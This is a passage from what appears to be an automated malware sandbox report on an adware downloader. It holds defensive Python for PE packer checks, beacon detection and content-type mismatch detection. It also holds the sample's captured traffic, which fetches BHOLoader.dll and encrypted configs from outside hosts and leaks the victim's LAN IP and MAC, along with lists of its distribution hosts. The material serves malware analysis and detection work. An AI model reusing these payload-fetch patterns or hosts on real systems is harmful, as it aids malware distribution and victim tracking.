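    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    rw = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    table = [  # (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics)
        (b"UPX0", 0x52000, 0x1000, 0, 0, rwx),
        (b"UPX1", len(upx1), 0x53000, len(upx1), ptr1, rwx),
        (b"UPX2", len(upx2), 0x54000, len(upx2), ptr2, rw),
    ]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(table), 0, 0, 0, size_of_optional, 0x0102)
    optional = bytearray(size_of_optional)
    struct.pack_into("<H", optional, 0, 0x10B)               # PE32 magic
    image = bytes(dos) + b"PE\0\0" + coff + bytes(optional)
    for name, vsize, vaddr, rsize, rptr, chars in table:
        image += SECTION_HDR.pack(name, vsize, vaddr, rsize, rptr, 0, 0, 0, 0, chars)
    return image + b"\0" * pad + upx1 + upx2


if __name__ == "__main__":
    sections = parse_sections(build_sample_pe())
    for s in sections:
        print(f"{s['name']:<6} va={s['virtual_address']:#x} vsize={s['virtual_size']} "
              f"raw={s['raw_size']} entropy={s['entropy']} md5={s['md5']}")
    print(packer_indicators(sections))
```

Replace `build_sample_pe()` with `open(path, "rb").read()` to run the same checks on a real file. The entropy threshold of 7.0 is a triage heuristic, not a proof of packing; the empty-RWX-section signal is the stronger one, since a packer has to reserve writable, executable memory for the image it unpacks at run time.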
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.92zy.com/asb/apro.jpg | 42.121.28.225 |
hxxp://plus.zzinfor.cn/plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 | 116.255.243.151 |
hxxp://na.b9.aicdn.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat | |
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA | 60.18.147.37 |
hxxp://na.b9.aicdn.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll | |
hxxp://ln.p2ptool.com/txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 | 60.18.147.37 |
hxxp://na.b9.aicdn.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat | |
hxxp://ln.p2ptool.com/txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 | 60.18.147.37 |
hxxp://na.b9.aicdn.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat | |
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 | 60.18.147.37 |
hxxp://na.b9.aicdn.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat | |
hxxp://na.b9.aicdn.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll | |
hxxp://na.b9.aicdn.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat | |
hxxp://na.b9.aicdn.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat | |
hxxp://na.b9.aicdn.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat | |
hxxp://log.app.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ | 115.238.251.56 |
hxxp://na.b9.aicdn.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat | |
hxxp://prd-update.b0.upaiyun.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat | 72.8.188.98 |
hxxp://app.log.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ | |
hxxp://prd-update.b0.upaiyun.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat | 72.8.188.98 |
hxxp://prd-update.b0.upaiyun.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat | 72.8.188.98 |
u.raidmedia.com.cn | 180.150.178.245 |
l.raidmedia.com.cn | 120.132.48.228 |
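Every configuration poll to ln.p2ptool.com above carries the same query shape: `ver`, `uid`, the victim's LAN address (`lip=192.168.25.207`) and MAC (`mac=000C298E22D8`), and an `md5`. That structure, rather than any one filename, is what a network detection should key on, and the leaked LAN IP and MAC identify the infected machine even when many hosts sit behind one NAT address. The following added example (written for this page, not part of Lavasoft's report) runs that logic over constructed proxy-log lines of the form `epoch client method url`; the URLs reuse the hosts and query strings listed in the table above, while the client addresses and timestamps are invented. The role of the `md5` parameter is not stated on the page, so the code only carries it through.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Hosts the sample contacted according to the URL table above (distribution, config and logging).
IOC_HOSTS = {
    "ln.p2ptool.com", "na.b9.aicdn.com", "prd-update.b0.upaiyun.com", "www.92zy.com",
    "plus.zzinfor.cn", "log.app.soomeng.com", "app.log.soomeng.com",
    "u.raidmedia.com.cn", "l.raidmedia.com.cn",
}
# Structure of the config-poll requests: /txt/<name>.txt carrying version, campaign id,
# the victim's LAN address and MAC, and an md5 (its exact role is not stated on the page).
BEACON_PATH = re.compile(r"^/txt/[^/]+\.txt$")
BEACON_KEYS = {"ver", "uid", "lip", "mac", "md5"}


def classify(url: str):
    """Return ("beacon", details), ("ioc_host", details) or (None, {}) for one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if BEACON_PATH.match(parts.path) and BEACON_KEYS.issubset(query):
        return "beacon", {"host": host, "resource": parts.path, "uid": query["uid"],
                          "lip": query["lip"], "mac": query["mac"].upper(), "md5": query["md5"]}
    if host in IOC_HOSTS:
        return "ioc_host", {"host": host, "resource": parts.path}
    return None, {}


def scan(log_text: str):
    """Run classify() over 'epoch client method url' lines and also collect the LAN IP/MAC
    each client leaked, which identifies the victim even behind NAT."""
    alerts = []
    leaked = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url = line.split(maxsplit=3)
        kind, info = classify(url)
        if kind is None:
            continue
        alerts.append({"ts": int(ts), "client": client, "method": method, "kind": kind, **info})
        if kind == "beacon":
            leaked[client].add((info["lip"], info["mac"]))
    return alerts, dict(leaked)


# Constructed proxy log (epoch, client IP, method, URL); the URLs reuse the query shape shown above.
SAMPLE_LOG = """\
1433299578 10.0.0.15 GET http://ln.p2ptool.com/txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA
1433299579 10.0.0.15 GET http://www.bing.com/search?q=weather
1433299584 10.0.0.15 GET http://ln.p2ptool.com/txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6
1433299590 10.0.0.22 GET http://prd-update.b0.upaiyun.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll
1433299591 10.0.0.22 GET http://example.org/txt/readme.txt?ver=1
"""

if __name__ == "__main__":
    alerts, leaked = scan(SAMPLE_LOG)
    for a in alerts:
        print(a["client"], a["kind"], a["host"], a["resource"])
    print(leaked)
```

The hostname match is the fragile half (the aicdn.com and upaiyun.com hosts are CDN names that can be rotated), so the structural beacon rule is the one worth keeping in a detection; the `User-Agent` string captured in the traffic below (MSIE 6.0 on Windows NT 5.1 with `Accept-Encoding: deflate` and `Accept-Language: zh-cn`) is a further field to add when the log source records it.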
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 2197516
Last-Modified: Wed, 20 May 2015 05:35:34 GMT
Connection: close
ETag: "555c1d26-21880c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKibQ8n5NnLuapg1eJ6vpylpPr3dzrdXxDw/xC0 hi48ahKqWrxewH8xxVOe3p/W0voytInO8LEpKJSqresov4P7JUR/tgBZAFWH2h8Hz/vZC73IP xJBA3Er7TyHyYD0jE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH2q6mjxhRug0Yz4h3K0AOlFokInOHjne8fpDJamidMpAhN2nIOvAyJtIiik9bH5OPGXJyfQNpBOtYm ARi1SoBtib4BGLVKgG1RrlJWPxioMMcfi/GUwqfa6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvvnWNUBCeri6vcqJUJDGDDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wv9P2tToITuQcTazQ2ZSPlrf3n4jIIw/2PE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTryY6XxeOXh0OjL9uMzHZHqjE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPVFNmcZPjX4jLy8pYTvxe axNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWKANo2jqKBv8Ztb v psEtsTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWGxEKfoBEbH/iKDnmhUeQSvE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5DV89XbEJ509fciHFohbrUKQo3SDfcckk0QLBQpmZkn1zTZVpHtvDynQRoV7CxP E/mxZqCXYR7KIWNX8fr6MQC8DLejYMRbS5B1WxoKLegZBeMSPxMQxasgm6nQO23Q3oGXGco vnawTsm/ZT2FfXZE8kq pcz0Hcz/UlH 3yO
<<< skipped >>>
GET /txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 3747852
Last-Modified: Tue, 02 Jun 2015 03:08:56 GMT
Connection: close
ETag: "556d1e48-39300c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsUwC6UEPuUHwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnLEwXHZOeqxhaNHsFJPygV5N5GdwjtmQLE/qfU9HvR8A9sSORw exnVF6psBA56drufRlRCIZxMrNCb9pdZ SzG7SnYDX74h7v9V 2E2jzr/jtMOEVDZTCvvCVqqMAS/u1iz4mhopJO0A557 PzIRYanKixfw4v1nkqb RqxQHMI8TazQ2ZSPlrueKHSyn HxKzdxPJVb22ufdg0 sDpLF9xs2uTSe47l/L3vgIuX1hA3mn IohxMHsWCHV8ybcrb2XJyfQNpBOtYm ARi1SoBtib4BGLVKgG0MdvCiDwkpTIr4wJH vtXy6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WvjQ iArxdhdB5i9zYlh3A/xNrNDZlI WvE2s0NmUj5a7E6Lj14vcKCvHloLLTHJfDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrMeSNkdky0GDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr/scZcqIZVXzpChets/4fM3E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPWwmwgWD4ygf/KbOy3dpQoDxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW ACc 6GEp9BGwDLuSqumXcTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWFMf2YO529Rm65lMOiWA47XE2s0NmUj5a qSnCa1jASD 8BgGQTR5rVH pJjTqpJgKRlBXEZaF DxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a80g7PwSDjpKaHUjqrw7Cn5TosG6X1WJKNGbDqOkocKG/Y20xSgdf/GEPDtVCynaMmR5x49eQN1kRmLhlwYHh/dn/gQ8oBRhRdkyin3v0 abkZX9CUqPKznL5y1ptSZhF 0fIc aBDnuaZ F3oOzw8FQu4ds/WP4kJLioQCSs4YA
<<< skipped >>>
GET /asb/apro.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.92zy.com/asb/apro.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Host: VVV.92zy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 03 Jun 2015 02:46:13 GMT
Content-Type: image/jpeg
Content-Length: 202
Last-Modified: Sat, 28 Mar 2015 09:48:14 GMT
Connection: keep-alive
ETag: "551678de-ca"
Expires: Fri, 03 Jul 2015 02:46:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
about:..res:..baidu.com..123.sogou.com..hao123.com..icafe..1x3x.com..https://..VVV.sohu.com..VVV.sina.com..qq.com..taobao.com..tmall.com..c:..javascript:..VVV.1x3xxx.com..adpubs.yaolan.com..92tezheng.ma..
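Note what came back for apro.jpg: the server declares `Content-Type: image/jpeg`, but the 202-byte body is not a JPEG (a JPEG begins with the bytes FF D8 FF); it is a `..`-delimited list of URL prefixes (about:, res:, baidu.com, https://, c:, javascript: and so on), which is a configuration list dressed up as an image. Content-type/magic mismatches of this kind are a cheap check to run over captured or proxied responses. The following added example (written for this page, not Lavasoft's tooling) parses a raw HTTP response, flags the mismatch, and splits the list out; the response is constructed to model the exchange above, with the body shortened and the defanged "VVV" written back as "www".

```python
# Magic bytes for the content types a loader might hide a payload or config behind.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
    "application/x-msdownload": (b"MZ",),
}


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def content_type_mismatch(headers: dict, body: bytes):
    """Return a description when the declared Content-Type has a known magic number the body lacks."""
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    magics = MAGIC.get(ctype)
    if magics is None or any(body.startswith(m) for m in magics):
        return None
    return f"declared {ctype} but body begins with {body[:12]!r}"


def split_prefix_list(body: bytes) -> list:
    """Split the '..'-delimited prefix list carried in the fake image into its entries."""
    return [p for p in body.decode("latin-1").split("..") if p]


def triage(raw: bytes) -> dict:
    """Summarize one response: status, mismatch (if any), length check, and extracted entries."""
    status, headers, body = parse_http_response(raw)
    mismatch = content_type_mismatch(headers, body)
    declared = headers.get("content-length")
    return {
        "status": status,
        "mismatch": mismatch,
        "length_ok": declared is None or int(declared) == len(body),
        "entries": split_prefix_list(body) if mismatch else [],
    }


# Constructed response modelled on the apro.jpg exchange above (shortened, 'www' restored).
SAMPLE_BODY = b"about:..res:..baidu.com..123.sogou.com..hao123.com..https://..www.sohu.com..qq.com..c:..javascript:.."
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: image/jpeg\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n\r\n" + SAMPLE_BODY
)

if __name__ == "__main__":
    result = triage(SAMPLE_RESPONSE)
    print(result["status"], "|", result["mismatch"])
    print(result["entries"])
```

The check only fires for content types with a well-known magic number, so a response declared `text/plain` is never flagged; that is deliberate, since the point is to catch a declared binary format that the body does not match, not to classify arbitrary text.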
GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
GET /txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:24 GMT
Content-Type: text/plain
Content-Length: 71356
Last-Modified: Fri, 29 May 2015 03:54:18 GMT
Connection: close
ETag: "5567e2ea-116bc"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLDnfyUHo1L2rgykKjEqfmpq7bcvyuOAbNWi0f4vD5S3GA jKk SLSSdkwRO7vkhVfkkyCAvWyVuXynxcnYiazqGPqoc49OClLztWlDZ12mHAnlforgf7zQ6V1c9o lLAbDRZFT2CIbJmqQmrWWV/ahkveKFZZtCKNxyE11iaSfexm44r2ObaL17YA0WBF/CmK S5mnOOUdpOuZ2HgP60hW4BaxQmDgbVnq0d15lVGosELU/92 QSlmcMj7bo9QsO6Pwk2kKXPvQb9oW9RvnvCiKddSP5OfdGwk7dGWHkiysufVgHxAFfjNzgdxyf09u/1twsXmGbDvMaKtoP2CwD6idva 2Y2XLu2zkMwBvp LQcnt3PX9Mw8tsIjtVs4tu3fKUoe2g92NlUsMSnT2sczOAFELEmZgER YfMYX8ZsD2RJIbzfb PVf9j8Y5pxJ rhAdidFlga1wJjSZI0ZOiQOknDc0pwLp3f2PxjmnEn6uEDU5sANNjc39bR09zcG9D7JZgVvPcKlAIh UYD6IMDRYEwA7BYvcP1gWqmYzB6K1iBnKNJsAgR2WmRADv7S4Gn9F0lmIy49S4G /Izdz4HyquyiPz1M0HqipwM2j4C3gFseQd56LPRg3w7dtro2zf7MSFUnCs2VbAN ApRJcyCSFlNdX1UBtpX1lrzwxNP2Xw/E82OARqd7OP9UcgcVFarVvvyM3c B8qqhDFZc1qnKKZ8ij1EiIq87SoYvkcPDj0zit8bCNKNJywv6br9luOyoD5j0IJcHAtXOJG13P7Zj01r2GOOSHiy4fPSocCXIgzBJyd7I/PRMI 6A sMU1MDC6grdH/yBJPyaUMSCxbjh1ybvySc7PVMI7Ht N8xPXgr53YH5vJMzJRN5xlbKsBR850bBJNl5xxXLTJfmtbGvg3Yroza4iDjS8OPx9IEDbZZqtQCVSmfp7adQzfP 9zsCneIliciUhbKkA /qTsrmJebjsXPgVaVbDzqY/kg1GxaFkW8GBBKLxaekEpRydKri3/9JQFIJpKviNhiG4lGUujm24y3kfObcWkTOpTw1jAZRxyObL8lC8paDFiG2Yv0KHLA3FEp1QlOWnsx6VWakSmmrRGOdxPMFzN4ilyaLS5E/7Vm5alNnhjDe/y4Gr5s/1RyBxUVqtVyBN3LV5cWd/s8xj4k1JNYqeyHHr1Hj 23W7KPTgk7wNTdzWHJvSBmeNzWc5kDyd9N 7EprsNyLhza9pSCVncipMW49ywvdOTKhBG/c5YxsI/4mPO01uKUF7Y6WmItj5qiw/8Ttv3VRObeWcEEZfkPT8Y/Gzz/znAKd4iWJyJSF5QEDQqBYLwqqKVwpBO8TJWM0SrN0V 5NpqdGuQAJ0b8BZ5puXacqoGM0SrN0V 5No103z0CC5kOyTR3R 1t1yBZSovhA/NfeOK3xsI0o0nLu mN5aCoABKej0dpkceFXYzRKs3RX7k12w5Jk96 1b0LXbHHmzkyi
<<< skipped >>>
GET /bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:39 GMT
Content-Type: application/octet-stream
Content-Length: 57209
Connection: keep-alive
X-Request-Id: 5b480a8636a9c82ad77a71c0d3687a89; aaf93b24edaacbea60fd3cf9a984ca16; f5aed991e02259cc470b700031d517ff
X-Source: U/200
Last-Modified: Thu, 04 Sep 2014 01:22:39 GMT
Expires: Wed, 10 Jun 2015 14:10:58 GMT
Cache-Control: max-age=686094
Accept-Ranges: bytes
Age: 40235
X-Cache: MISS|MISS from cache_img_88; MISS(S)|HIT from cun-sd-tao-076; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z.....t.ap'.....}|'.ap'F}~'.ap'.Gz'.ap'.~{'.ap'Ki/..QFi-'.8.1q'.(..{0..:At'.ap'RichT..g.....PE..L...c..T..r...!.........`..................(.....0....!............)..8................E.......d......_............1...........text................. ..`.rdata................R@..@.'...DS... ..........@....reloc......j. ...`..G@..B7.................g...D$....V3............T$.RP.t$..Q........0D$.#......#....SR.T$.Rj.P.Q...uZ.\$...uR.D$...t0.T$.F.....RSP....u..D$...t...P.Q........P...R..D$..T$.X.%..Z. t.....P...Q...[^..........Q.D$.V3.;.tc..p.Rhh.......t. |L....;.tD.T$..t$...Rh(#.p.Q...|"....;.t..L$.QP........D$......P......G^Y.....Vj.........@P.................t...u.b.p..t..0...S^.3.^F..QSUVW3...`9...|$ .\$....D$.Pj@WSV........t4.L$.UWQ........ .P.....X.A.D$....P...8.g_..^][.......L$.j.PQ.....M.....j.h....d...@Pd.%.......SV..W.t$..F.P.......D$.3.j..|$(.F...n.....@.....F .~$.^(.D$$....t....L$..~`.N\.~d.~h.T$..D$.RPhp ...D$0........~l.|$..|$ ..f....t..D$.;.t.P...........<m.........._^[d...."..a.rQ.. ..........V........D$..t.V..iA.Q.^...................|$........G`u.0.D$.....t..H..@...t.<.t.......Q.m^....O(.w`.wd.wh......_ .o..D$ ..3;.t....6P...........;.u..M.Q.*C.....3.W.E..E...v.L$._^]..!..P.....VWh. ...C(.{(h.......\$..P............>.......j.V.5..............h| ..;....R.%.....Cp....2. .]8.@..Cl5..a5.......3...\....I.....v..uh...K...t).A!..."<.t...uI..U.A....g....\$._^].Cl[Y...u.j....M....C....w.;.s.".. ...U....*...{
<<< skipped >>>
GET /browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
